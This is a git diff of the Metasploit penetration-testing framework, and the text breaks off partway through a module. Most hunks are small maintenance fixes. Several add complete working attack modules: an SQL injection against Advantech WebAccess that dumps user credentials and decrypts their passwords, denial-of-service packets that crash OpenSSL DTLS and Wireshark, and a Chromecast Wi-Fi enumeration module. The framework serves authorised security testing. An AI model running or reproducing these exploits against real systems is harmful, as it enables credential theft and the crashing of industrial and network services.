diff --git a/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb b/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb
index b978544f56..57fc4959d3 100644
--- a/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb
+++ b/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb
@@ -358,7 +358,7 @@ class Metasploit3 < Msf::Auxiliary
     #CREATE TABLE TO STORE SQL SERVER DATA LOOT
     sql_data_tbl = Rex::Ui::Text::Table.new(
       'Header'  => 'SQL Server Data',
-      'Ident'   => 1,
+      'Indent'   => 1,
       'Columns' => ['Server', 'Database', 'Schema', 'Table', 'Column', 'Data Type', 'Sample Data', 'Row Count']
     )
 
diff --git a/modules/auxiliary/admin/mssql/mssql_sql.rb b/modules/auxiliary/admin/mssql/mssql_sql.rb
index ae4d743ae6..6ad1b3abf7 100644
--- a/modules/auxiliary/admin/mssql/mssql_sql.rb
+++ b/modules/auxiliary/admin/mssql/mssql_sql.rb
@@ -17,7 +17,7 @@ class Metasploit3 < Msf::Auxiliary
           This module will allow for simple SQL statements to be executed against a
           MSSQL/MSDE instance given the appropiate credentials.
       },
-      'Author'         => [ 'tebo <tebo [at] attackresearch [dot] com>' ],
+      'Author'         => [ 'tebo <tebo[at]attackresearch.com>' ],
       'License'        => MSF_LICENSE,
       'References'     =>
         [
diff --git a/modules/auxiliary/admin/oracle/osb_execqr2.rb b/modules/auxiliary/admin/oracle/osb_execqr2.rb
index 261ab2395a..b10f76cd21 100644
--- a/modules/auxiliary/admin/oracle/osb_execqr2.rb
+++ b/modules/auxiliary/admin/oracle/osb_execqr2.rb
@@ -49,9 +49,7 @@ class Metasploit3 < Msf::Auxiliary
         'method' => 'POST',
       }, 5)
 
-      if (res and res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/PHPSESSID=(.*);(.*)/i))
-
-        sessionid = res.headers['Set-Cookie'].split(';')[0]
+      if res && res.get_cookies.match(/PHPSESSID=(.*);(.*)/i)
 
           print_status("Sending command: #{datastore['CMD']}...")
 
@@ -59,7 +57,7 @@ class Metasploit3 < Msf::Auxiliary
             {
               'uri'	=> '/property_box.php',
               'data'  => 'type=Sections&vollist=75' + Rex::Text.uri_encode("&" + cmd),
-              'cookie' => sessionid,
+              'cookie' => res.get_cookies,
               'method' => 'POST',
             }, 5)
 
diff --git a/modules/auxiliary/admin/oracle/osb_execqr3.rb b/modules/auxiliary/admin/oracle/osb_execqr3.rb
index 06264af018..d833ef5406 100644
--- a/modules/auxiliary/admin/oracle/osb_execqr3.rb
+++ b/modules/auxiliary/admin/oracle/osb_execqr3.rb
@@ -46,9 +46,7 @@ class Metasploit3 < Msf::Auxiliary
         'method' => 'POST',
       }, 5)
 
-      if (res and res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/PHPSESSID=(.*);(.*)/i))
-
-        sessionid = res.headers['Set-Cookie'].split(';')[0]
+      if res && res.get_cookies.match(/PHPSESSID=(.*);(.*)/i)
 
           print_status("Sending command: #{datastore['CMD']}...")
 
@@ -56,7 +54,7 @@ class Metasploit3 < Msf::Auxiliary
             {
               'uri'	=> '/property_box.php',
               'data'  => 'type=Job&jlist=' + Rex::Text.uri_encode('&' + cmd),
-              'cookie' => sessionid,
+              'cookie' => res.get_cookies,
               'method' => 'POST',
             }, 5)
 
diff --git a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb
new file mode 100644
index 0000000000..8225a5cd31
--- /dev/null
+++ b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb
@@ -0,0 +1,299 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rexml/document'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+  include REXML
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Advantech WebAccess SQL Injection',
+      'Description'    => %q{
+        This module exploits a SQL injection vulnerability found in Advantech WebAccess 7.1. The
+        vulnerability exists in the DBVisitor.dll component, and can be abused through malicious
+        requests to the ChartThemeConfig web service. This module can be used to extract the site
+        and project usernames and hashes.
+      },
+      'References'     =>
+        [
+          [ 'CVE', '2014-0763' ],
+          [ 'ZDI', '14-077' ],
+          [ 'OSVDB', '105572' ],
+          [ 'BID', '66740' ],
+          [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-14-079-03' ]
+        ],
+      'Author'         =>
+        [
+          'rgod <rgod[at]autistici.org>', # Vulnerability Discovery
+          'juan vazquez' # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'DisclosureDate' => "Apr 08 2014"
+    ))
+
+    register_options(
+      [
+        OptString.new("TARGETURI", [true, 'The path to the BEMS Web Site', '/BEMS']),
+        OptString.new("WEB_DATABASE", [true, 'The path to the bwCfg.mdb database in the target', "C:\\WebAccess\\Node\\config\\bwCfg.mdb"])
+      ], self.class)
+  end
+
+  def build_soap(injection)
+    xml = Document.new
+    xml.add_element(
+        "s:Envelope",
+        {
+            'xmlns:s' => "http://schemas.xmlsoap.org/soap/envelope/"
+        })
+    xml.root.add_element("s:Body")
+    body = xml.root.elements[1]
+    body.add_element(
+        "GetThemeNameList",
+        {
+            'xmlns' => "http://tempuri.org/"
+        })
+    name_list = body.elements[1]
+    name_list.add_element("userName")
+    name_list.elements['userName'].text = injection
+
+    xml.to_s
+  end
+
+  def do_sqli(injection, mark)
+    xml = build_soap(injection)
+
+    res = send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri.path.to_s, "Services", "ChartThemeConfig.svc"),
+      'ctype'    => 'text/xml; charset=UTF-8',
+      'headers'  => {
+          'SOAPAction' => '"http://tempuri.org/IChartThemeConfig/GetThemeNameList"'
+      },
+      'data'      => xml
+    })
+
+    unless res && res.code == 200 && res.body && res.body.include?(mark)
+      return nil
+    end
+
+    res.body.to_s
+  end
+
+  def check
+    mark = Rex::Text.rand_text_alpha(8 + rand(5))
+    injection =  "#{Rex::Text.rand_text_alpha(8 + rand(5))}' "
+    injection << "union all select '#{mark}' from BAThemeSetting where '#{Rex::Text.rand_text_alpha(2)}'='#{Rex::Text.rand_text_alpha(3)}"
+    data = do_sqli(injection, mark)
+
+    if data.nil?
+      return Msf::Exploit::CheckCode::Safe
+    end
+
+    Msf::Exploit::CheckCode::Vulnerable
+  end
+
+  def parse_users(xml, mark, separator)
+    doc = Document.new(xml)
+
+    strings = XPath.match(doc, "s:Envelope/s:Body/GetThemeNameListResponse/GetThemeNameListResult/a:string").map(&:text)
+    strings_length = strings.length
+
+    unless strings_length > 1
+      return
+    end
+
+    i = 0
+    strings.each do |result|
+      next if result == mark
+      @users << result.split(separator)
+      i = i + 1
+    end
+
+  end
+
+  def run
+    print_status("#{peer} - Exploiting sqli to extract users information...")
+    mark = Rex::Text.rand_text_alpha(8 + rand(5))
+    rand = Rex::Text.rand_text_numeric(2)
+    separator = Rex::Text.rand_text_alpha(5 + rand(5))
+    # While installing I can only configure an Access backend, but
+    # according to documentation other backends are supported. This
+    # injection should be compatible, hopefully, with most backends.
+    injection =  "#{Rex::Text.rand_text_alpha(8 + rand(5))}' "
+    injection << "union all select UserName + '#{separator}' + Password + '#{separator}' + Password2 + '#{separator}BAUser' from BAUser where #{rand}=#{rand} "
+    injection << "union all select UserName + '#{separator}' + Password + '#{separator}' + Password2 + '#{separator}pUserPassword' from pUserPassword IN '#{datastore['WEB_DATABASE']}' where #{rand}=#{rand} "
+    injection << "union all select UserName + '#{separator}' + Password + '#{separator}' + Password2 + '#{separator}pAdmin' from pAdmin IN '#{datastore['WEB_DATABASE']}' where #{rand}=#{rand} "
+    injection << "union all select '#{mark}' from BAThemeSetting where '#{Rex::Text.rand_text_alpha(2)}'='#{Rex::Text.rand_text_alpha(3)}"
+    data = do_sqli(injection, mark)
+
+    if data.blank?
+      print_error("#{peer} - Error exploiting sqli")
+      return
+    end
+
+    @users = []
+    @plain_passwords = []
+
+    print_status("#{peer} - Parsing extracted data...")
+    parse_users(data, mark, separator)
+
+    if @users.empty?
+      print_error("#{peer} - Users not found")
+      return
+    else
+      print_good("#{peer} - #{@users.length} users found!")
+    end
+
+    users_table = Rex::Ui::Text::Table.new(
+      'Header'  => 'Advantech WebAccess Users',
+      'Indent'   => 1,
+      'Columns' => ['Username', 'Encrypted Password', 'Key', 'Recovered password', 'Origin']
+    )
+
+    for i in 0..@users.length - 1
+      @plain_passwords[i] =
+          begin
+            decrypt_password(@users[i][1], @users[i][2])
+          rescue
+            "(format not recognized)"
+          end
+
+      @plain_passwords[i] = "(blank password)" if @plain_passwords[i].empty?
+
+      begin
+        @plain_passwords[i].encode("ISO-8859-1").to_s
+      rescue Encoding::UndefinedConversionError
+        chars = @plain_passwords[i].unpack("C*")
+        @plain_passwords[i] = "0x#{chars.collect {|c| c.to_s(16)}.join(", 0x")}"
+        @plain_passwords[i] << " (ISO-8859-1 hex chars)"
+      end
+
+      report_auth_info({
+       :host => rhost,
+       :port => rport,
+       :user => @users[i][0],
+       :pass => @plain_passwords[i],
+       :type => "password",
+       :sname => (ssl ? "https" : "http"),
+       :proof => "Leaked encrypted password from #{@users[i][3]}: #{@users[i][1]}:#{@users[i][2]}"
+      })
+
+      users_table << [@users[i][0], @users[i][1], @users[i][2], @plain_passwords[i], user_type(@users[i][3])]
+    end
+
+    print_line(users_table.to_s)
+  end
+
+  def user_type(database)
+    user_type = database
+
+    unless database == "BAUser"
+      user_type << " (Web Access)"
+    end
+
+    user_type
+  end
+
+  def decrypt_password(password, key)
+    recovered_password = recover_password(password)
+    recovered_key = recover_key(key)
+
+    recovered_bytes = decrypt_bytes(recovered_password, recovered_key)
+    password = []
+
+    recovered_bytes.each { |b|
+      if b == 0
+        break
+      else
+        password.push(b)
+      end
+    }
+
+    return password.pack("C*")
+  end
+
+  def recover_password(password)
+    bytes = password.unpack("C*")
+    recovered = []
+
+    i = 0
+    j = 0
+    while i < 16
+      low = bytes[i]
+      if low < 0x41
+        low = low - 0x30
+      else
+        low = low - 0x37
+      end
+      low = low * 16
+
+      high = bytes[i+1]
+      if high < 0x41
+        high = high - 0x30
+      else
+        high = high - 0x37
+      end
+
+      recovered_byte = low + high
+      recovered[j] = recovered_byte
+      i = i + 2
+      j = j + 1
+    end
+
+    recovered
+  end
+
+  def recover_key(key)
+    bytes = key.unpack("C*")
+    recovered = 0
+
+    bytes[0, 8].each { |b|
+      recovered = recovered * 16
+      if b < 0x41
+        byte_weight = b - 0x30
+      else
+        byte_weight = b - 0x37
+      end
+      recovered = recovered + byte_weight
+    }
+
+    recovered
+  end
+
+  def decrypt_bytes(bytes, key)
+    result = []
+    xor_table = [0xaa, 0xa5, 0x5a, 0x55]
+    key_copy = key
+    for i in 0..7
+      byte = (crazy(bytes[i] ,8 - (key & 7)) & 0xff)
+      result.push(byte ^ xor_table[key_copy & 3])
+      key_copy = key_copy / 4
+      key = key / 8
+    end
+
+    result
+  end
+
+  def crazy(byte, magic)
+    result = byte & 0xff
+
+    while magic > 0
+      result = result * 2
+        if result & 0x100 == 0x100
+          result = result + 1
+        end
+        magic = magic - 1
+    end
+
+    result
+  end
+
+end
+
diff --git a/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb b/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb
index b11202c9d3..fe8379acbf 100644
--- a/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb
+++ b/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb
@@ -25,7 +25,7 @@ class Metasploit3 < Msf::Auxiliary
       },
       'Author'         =>
         [
-          'vlad902 <vlad902 [at] gmail.com>', # MSF v2 module
+          'vlad902 <vlad902[at]gmail.com>', # MSF v2 module
           'jduck'  # Ported to MSF v3
         ],
       'License'        => MSF_LICENSE,
diff --git a/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb b/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb
index 5fe695a22f..31edbcc74b 100644
--- a/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb
+++ b/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb
@@ -68,8 +68,8 @@ class Metasploit3 < Msf::Auxiliary
         'data'    => data
       }, 25)
 
-    if res and res.code == 302 and res.headers['Set-Cookie'] =~ /sid/
-      session = res.headers['Set-Cookie'].scan(/sid\=(\w+)\;*/).flatten[0] || ''
+    if res and res.code == 302 and res.get_cookies =~ /sid/
+      session = res.get_cookies.scan(/sid\=(\w+)\;*/).flatten[0] || ''
       if session and not session.empty?
         print_good "#{peer} - Authentication successful"
       else
diff --git a/modules/auxiliary/crawler/msfcrawler.rb b/modules/auxiliary/crawler/msfcrawler.rb
index fbd7ec2175..27c3e2e3e4 100644
--- a/modules/auxiliary/crawler/msfcrawler.rb
+++ b/modules/auxiliary/crawler/msfcrawler.rb
@@ -258,11 +258,6 @@ class Metasploit3 < Msf::Auxiliary
         # In case modules or crawler calls to_s on de-chunked responses
         #
         resp.transfer_chunked = false
-        if resp['Set-Cookie']
-          #puts "Set Cookie: #{resp['Set-Cookie']}"
-          #puts "Storing in cookie jar for host:port #{reqopts['rhost']}:#{reqopts['rport']}"
-          #$cookiejar["#{reqopts['rhost']}:#{reqopts['rport']}"] = resp['Set-Cookie']
-        end
 
         if datastore['StoreDB']
           storedb(reqopts,resp,$dbpathmsf)
diff --git a/modules/auxiliary/dos/hp/data_protector_rds.rb b/modules/auxiliary/dos/hp/data_protector_rds.rb
index d5bd75f748..47699d7fb3 100644
--- a/modules/auxiliary/dos/hp/data_protector_rds.rb
+++ b/modules/auxiliary/dos/hp/data_protector_rds.rb
@@ -6,7 +6,6 @@
 require 'msf/core'
 
 class Metasploit3 < Msf::Auxiliary
-  Rank = ManualRanking
 
   include Msf::Exploit::Remote::Tcp
   include Msf::Auxiliary::Dos
diff --git a/modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb b/modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb
index 1816d668ac..bd39f544d2 100644
--- a/modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb
+++ b/modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb
@@ -22,8 +22,8 @@ class Metasploit3 < Msf::Auxiliary
       'Author'         =>
         [
           'Steve Jones', #original discoverer
-          'Hoagie <andi [at] void {dot} at>', #original public exploit
-          'Paulino Calderon <calderon [at] websec {dot} mx>', #metasploit module
+          'Hoagie <andi[at]void.at>', #original public exploit
+          'Paulino Calderon <calderon[at]websec.mx>', #metasploit module
         ],
       'License'        => MSF_LICENSE,
       'References'     =>
diff --git a/modules/auxiliary/dos/scada/yokogawa_logsvr.rb b/modules/auxiliary/dos/scada/yokogawa_logsvr.rb
index 8f11b42279..1fef0d305a 100644
--- a/modules/auxiliary/dos/scada/yokogawa_logsvr.rb
+++ b/modules/auxiliary/dos/scada/yokogawa_logsvr.rb
@@ -29,7 +29,8 @@ class Metasploit3 < Msf::Auxiliary
       'References'     =>
         [
           [ 'URL', 'http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf' ],
-          [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2014/03/10/yokogawa-centum-cs3000-vulnerabilities' ]
+          [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2014/03/10/yokogawa-centum-cs3000-vulnerabilities' ],
+          [ 'CVE', '2014-0781']
         ],
       'DisclosureDate' => 'Mar 10 2014',
     ))
diff --git a/modules/auxiliary/dos/ssl/dtls_fragment_overflow.rb b/modules/auxiliary/dos/ssl/dtls_fragment_overflow.rb
new file mode 100644
index 0000000000..7c6f059d6b
--- /dev/null
+++ b/modules/auxiliary/dos/ssl/dtls_fragment_overflow.rb
@@ -0,0 +1,82 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Auxiliary::Dos
+  include Exploit::Remote::Udp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'OpenSSL DTLS Fragment Buffer Overflow DoS',
+      'Description' => %q{
+        This module performs a Denial of Service Attack against Datagram TLS in
+        OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h.
+        This occurs when a DTLS ClientHello message has multiple fragments and the
+        fragment lengths of later fragments are larger than that of the first, a
+        buffer overflow occurs, causing a DoS.
+      },
+      'Author'  =>
+        [
+          'Juri Aedla <asd[at]ut.ee>', # Vulnerability discovery
+          'Jon Hart <jon_hart[at]rapid7.com>' # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['CVE', '2014-0195'],
+          ['ZDI', '14-173'],
+          ['BID', '67900'],
+          ['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/ZDI-14-173-CVE-2014-0195-OpenSSL-DTLS-Fragment-Out-of-Bounds/ba-p/6501002'],
+          ['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Once-Bled-Twice-Shy-OpenSSL-CVE-2014-0195/ba-p/6501048']
+        ],
+      'DisclosureDate' => 'Jun 05 2014'))
+
+    register_options([
+      Opt::RPORT(4433),
+      OptInt.new('VERSION', [true,  "SSl/TLS version", 0xFEFF])
+    ], self.class)
+
+  end
+
+  def build_tls_fragment(type, length, seq, frag_offset, frag_length, frag_body=nil)
+    # format is: type (1 byte), total length (3 bytes), sequence # (2 bytes),
+    # fragment offset (3 bytes), fragment length (3 bytes), fragment body
+    sol = (seq << 48) | (frag_offset << 24) | frag_length
+    [
+      (type << 24) | length,
+      (sol >> 32),
+      (sol & 0x00000000FFFFFFFF)
+    ].pack("NNN") + frag_body
+  end
+
+  def build_tls_message(type, version, epoch, sequence, message)
+    # format is: type (1 byte), version (2 bytes), epoch # (2 bytes),
+    # sequence # (6 bytes) + message length (2 bytes), message body
+    es = (epoch << 48) | sequence
+    [
+      type,
+      version,
+      (es >> 32),
+      (es & 0x00000000FFFFFFFF),
+      message.length
+    ].pack("CnNNn") + message
+  end
+
+  def run
+    # add a small fragment
+    fragments = build_tls_fragment(1, 2, 0, 0, 1, 'C')
+    # add a large fragment where the length is significantly larger than that of the first
+    # TODO: you'll need to tweak the 2nd, 5th and 6th arguments to trigger the condition in some situations
+    fragments << build_tls_fragment(1, 1234, 0, 0, 123, Rex::Text.rand_text_alpha(1234))
+    message = build_tls_message(22, datastore['VERSION'], 0, 0, fragments)
+    connect_udp
+    print_status("#{rhost}:#{rport} - Sending fragmented DTLS client hello packet")
+    udp_sock.put(message)
+    disconnect_udp
+  end
+end
diff --git a/modules/auxiliary/dos/tcp/junos_tcp_opt.rb b/modules/auxiliary/dos/tcp/junos_tcp_opt.rb
index 5118638174..d13a07f95e 100644
--- a/modules/auxiliary/dos/tcp/junos_tcp_opt.rb
+++ b/modules/auxiliary/dos/tcp/junos_tcp_opt.rb
@@ -10,9 +10,6 @@ class Metasploit3 < Msf::Auxiliary
   include Msf::Exploit::Capture
   include Msf::Auxiliary::Dos
 
-  # The whole point is to cause a router crash.
-  Rank = ManualRanking
-
   def initialize
     super(
       'Name'        => 'Juniper JunOS Malformed TCP Option',
diff --git a/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb b/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb
index 01ad7774b4..3a52efa1a7 100644
--- a/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb
+++ b/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb
@@ -4,7 +4,6 @@
 ##
 
 class Metasploit3 < Msf::Auxiliary
-  Rank = ManualRanking
 
   include Msf::Exploit::Remote::Udp
   #include Msf::Exploit::Remote::SMB
diff --git a/modules/auxiliary/dos/wireshark/capwap.rb b/modules/auxiliary/dos/wireshark/capwap.rb
new file mode 100644
index 0000000000..01c6c48a57
--- /dev/null
+++ b/modules/auxiliary/dos/wireshark/capwap.rb
@@ -0,0 +1,55 @@
+#
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::Udp
+  include Msf::Auxiliary::Dos
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Wireshark CAPWAP Dissector DoS',
+      'Description'    => %q{
+        This module injects a malformed UDP packet to crash Wireshark and TShark 1.8.0 to 1.8.7, as well
+        as 1.6.0 to 1.6.15. The vulnerability exists in the CAPWAP dissector which fails to handle a
+        packet correctly when an incorrect length is given.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Laurent Butti', # Discovery vulnerability
+          'j0sm1'  # Auxiliary msf module
+        ],
+      'References'     =>
+        [
+          ['CVE', '2013-4074'],
+          ['OSVDB', '94091'],
+          ['BID', '60500']
+        ],
+      'DisclosureDate' => 'Apr 28 2014'))
+
+    # Protocol capwap needs port 5247 to trigger the dissector in wireshark
+    register_options([ Opt::RPORT(5247) ], self.class)
+  end
+
+  def run
+
+    connect_udp
+
+    # We send a packet incomplete to crash dissector
+    print_status("#{rhost}:#{rport} - Trying to crash wireshark capwap dissector ...")
+    # With 0x90 in this location we set to 1 the flags F and M. The others flags are sets to 0, then
+    # the dissector crash
+    # You can see more information here: https://www.rfc-editor.org/rfc/rfc5415.txt
+    # F = 1 ; L = 0 ; W = 0 ; M = 1 ; K = 0 ; Flags = 000
+    buf = Rex::Text.rand_text(3) + "\x90" + Rex::Text.rand_text(15)
+    udp_sock.put(buf)
+
+    disconnect_udp
+
+  end
+end
diff --git a/modules/auxiliary/fuzzers/ftp/client_ftp.rb b/modules/auxiliary/fuzzers/ftp/client_ftp.rb
index e1819f6a0e..0642f67b20 100644
--- a/modules/auxiliary/fuzzers/ftp/client_ftp.rb
+++ b/modules/auxiliary/fuzzers/ftp/client_ftp.rb
@@ -30,7 +30,7 @@ class Metasploit3 < Msf::Auxiliary
     register_options(
       [
       OptPort.new('SRVPORT', [ true, "The local port to listen on.", 21 ]),
-      OptString.new('FUZZCMDS', [ true, "Comma separated list of commands to fuzz.", "LIST,NLST,LS,RETR" ]),
+      OptString.new('FUZZCMDS', [ true, "Comma separated list of commands to fuzz (Uppercase).", "LIST,NLST,LS,RETR", nil, /(?:[A-Z]+,?)+/ ]),
       OptInt.new('STARTSIZE', [ true, "Fuzzing string startsize.",1000]),
       OptInt.new('ENDSIZE', [ true, "Max Fuzzing string size.",200000]),
       OptInt.new('STEPSIZE', [ true, "Increment fuzzing string each attempt.",1000]),
diff --git a/modules/auxiliary/fuzzers/http/http_form_field.rb b/modules/auxiliary/fuzzers/http/http_form_field.rb
index 0e3f0a0454..7c879f4c7b 100644
--- a/modules/auxiliary/fuzzers/http/http_form_field.rb
+++ b/modules/auxiliary/fuzzers/http/http_form_field.rb
@@ -455,21 +455,23 @@ class Metasploit3 < Msf::Auxiliary
       formidx = formidx + 1
       formcnt += 1
     end
+
     if forms.size > 0
       print_status("    Forms : ")
     end
+
     forms.each do | thisform |
       print_status("     - Name : #{thisform[:name]}, ID : #{thisform[:id]}, Action : #{thisform[:action]}, Method : #{thisform[:method]}")
     end
+
     return forms
   end
-  def extract_cookie(body)
-    return body["Set-Cookie"]
-  end
+
   def set_cookie(cookie)
     @get_data_headers["Cookie"]=cookie
     @send_data[:headers]["Cookie"]=cookie
   end
+
   def run
     init_fuzzdata()
     init_vars()
@@ -487,10 +489,11 @@ class Metasploit3 < Msf::Auxiliary
       print_error("No response")
       return
     end
+
     if datastore['HANDLECOOKIES']
-      cookie = extract_cookie(response.headers)
+      cookie = response.get_cookies
       set_cookie(cookie)
-      print_status("Set cookie:#{cookie}")
+      print_status("Set cookie: #{cookie}")
       print_status("Grabbing webpage #{datastore['URL']} from #{datastore['RHOST']} using cookies")
 
       response = send_request_raw(
diff --git a/modules/auxiliary/gather/apache_rave_creds.rb b/modules/auxiliary/gather/apache_rave_creds.rb
index d9eeaf457c..1b654779fc 100644
--- a/modules/auxiliary/gather/apache_rave_creds.rb
+++ b/modules/auxiliary/gather/apache_rave_creds.rb
@@ -57,7 +57,7 @@ class Metasploit3 < Msf::Auxiliary
       }
     })
 
-    if res and res.code == 302 and res.headers['Location'] !~ /authfail/ and res.headers['Set-Cookie'] =~ /JSESSIONID=(.*);/
+    if res and res.code == 302 and res.headers['Location'] !~ /authfail/ and res.get_cookies =~ /JSESSIONID=(.*);/
       return $1
     else
       return nil
diff --git a/modules/auxiliary/gather/chromecast_wifi.rb b/modules/auxiliary/gather/chromecast_wifi.rb
new file mode 100644
index 0000000000..dbcf693a9a
--- /dev/null
+++ b/modules/auxiliary/gather/chromecast_wifi.rb
@@ -0,0 +1,131 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'Chromecast Wifi Enumeration',
+      'Description' => %q{
+        This module enumerates wireless access points through Chromecast.
+      },
+      'Author' => ['wvu'],
+      'References' => [
+        ['URL', 'http://www.google.com/intl/en/chrome/devices/chromecast/index.html'] # vendor website
+      ],
+      'License' => MSF_LICENSE
+    ))
+
+    register_options([
+      Opt::RPORT(8008)
+    ], self.class)
+  end
+
+  def run
+    res = scan
+
+    if res && res.code == 200
+      waps = Rex::Ui::Text::Table.new(
+        'Header' => 'Wireless Access Points',
+        'Columns' => [
+          'BSSID',
+          'PWR',
+          'ENC',
+          'CIPHER',
+          'AUTH',
+          'ESSID'
+        ],
+        'SortIndex' => -1
+      )
+
+      JSON.parse(res.body).each do |wap|
+        waps << [
+          wap['bssid'],
+          wap['signal_level'],
+          enc(wap),
+          cipher(wap),
+          auth(wap),
+          wap['ssid'] + (wap['wpa_id'] ? ' (*)' : '')
+        ]
+      end
+
+      print_line(waps.to_s)
+
+      report_note(
+        :host => rhost,
+        :port => rport,
+        :proto => 'tcp',
+        :type => 'chromecast.wifi',
+        :data => waps.to_csv
+      )
+    end
+  end
+
+  def scan
+    begin
+      send_request_raw(
+        'method' => 'POST',
+        'uri' => '/setup/scan_wifi',
+        'agent' => Rex::Text.rand_text_english(rand(42) + 1)
+      )
+      send_request_raw(
+        'method' => 'GET',
+        'uri' => '/setup/scan_results',
+        'agent' => Rex::Text.rand_text_english(rand(42) + 1)
+      )
+    rescue Rex::ConnectionRefused, Rex::ConnectionTimeout,
+           Rex::HostUnreachable => e
+      fail_with(Failure::Unreachable, e)
+    ensure
+      disconnect
+    end
+  end
+
+  def enc(wap)
+    case wap['wpa_auth']
+    when 1
+      'OPN'
+    when 2
+      'WEP'
+    when 5
+      'WPA'
+    when 0, 7
+      'WPA2'
+    else
+      wap['wpa_auth']
+    end
+  end
+
+  def cipher(wap)
+    case wap['wpa_cipher']
+    when 1
+      ''
+    when 2
+      'WEP'
+    when 3
+      'TKIP'
+    when 4
+      'CCMP'
+    else
+      wap['wpa_cipher']
+    end
+  end
+
+  def auth(wap)
+    case wap['wpa_auth']
+    when 0
+      'MGT'
+    when 5, 7
+      'PSK'
+    else
+      ''
+    end
+  end
+
+end
diff --git a/modules/auxiliary/gather/dns_reverse_lookup.rb b/modules/auxiliary/gather/dns_reverse_lookup.rb
index dc0b0167d2..d787886cc9 100644
--- a/modules/auxiliary/gather/dns_reverse_lookup.rb
+++ b/modules/auxiliary/gather/dns_reverse_lookup.rb
@@ -12,26 +12,32 @@ class Metasploit3 < Msf::Auxiliary
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'		   => 'DNS Reverse Lookup Enumeration',
-      'Description'	=> %q{
+      'Name'       => 'DNS Reverse Lookup Enumeration',
+      'Description' => %q{
           This module performs DNS reverse lookup against a given IP range in order to
         retrieve valid addresses and names.
       },
-      'Author'		=> [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ],
-      'License'		=> BSD_LICENSE
+      'Author'    =>
+        [
+          'Carlos Perez <carlos_perez[at]darkoperator.com>', # Base code
+          'Thanat0s <thanspam[at]trollprod.org>' # Output, Throttling & Db notes add
+        ],
+      'License'   => BSD_LICENSE
     ))
 
     register_options(
       [
         OptAddressRange.new('RANGE', [true, 'IP range to perform reverse lookup against.']),
-        OptAddress.new('NS', [ false, "Specify the nameserver to use for queries, otherwise use the system DNS." ])
+        OptAddress.new('NS', [ false, "Specify the nameserver to use for queries, otherwise use the system DNS." ]),
+        OptString.new('OUT_FILE', [ false, "Specify a CSV output file" ])
       ], self.class)
 
     register_advanced_options(
       [
         OptInt.new('RETRY', [ false, "Number of tries to resolve a record if no response is received.", 2]),
         OptInt.new('RETRY_INTERVAL', [ false, "Number of seconds to wait before doing a retry.", 2]),
-        OptInt.new('THREADS', [ true, "The number of concurrent threads.", 1])
+        OptInt.new('THREADS', [ true, "The number of concurrent threads.", 1]),
+        OptInt.new('THROTTLE', [ false, "Specify the resolution throttle in query per sec. 0 means unthrottled",0 ])
       ], self.class)
   end
 
@@ -55,20 +61,51 @@ class Metasploit3 < Msf::Auxiliary
     print_status("Running reverse lookup against IP range #{iprange}")
     ar = Rex::Socket::RangeWalker.new(iprange)
     tl = []
+    # Basic Throttling
+    sleep_time = 0.0
+    if (datastore['THROTTLE'] != 0)
+      sleep_time = (1.0/datastore['THROTTLE'])*datastore['THREADS']
+      print_status("Throttle set to #{datastore['THROTTLE']} queries per seconds")
+    end
+    # Output..
+    if datastore['OUT_FILE']
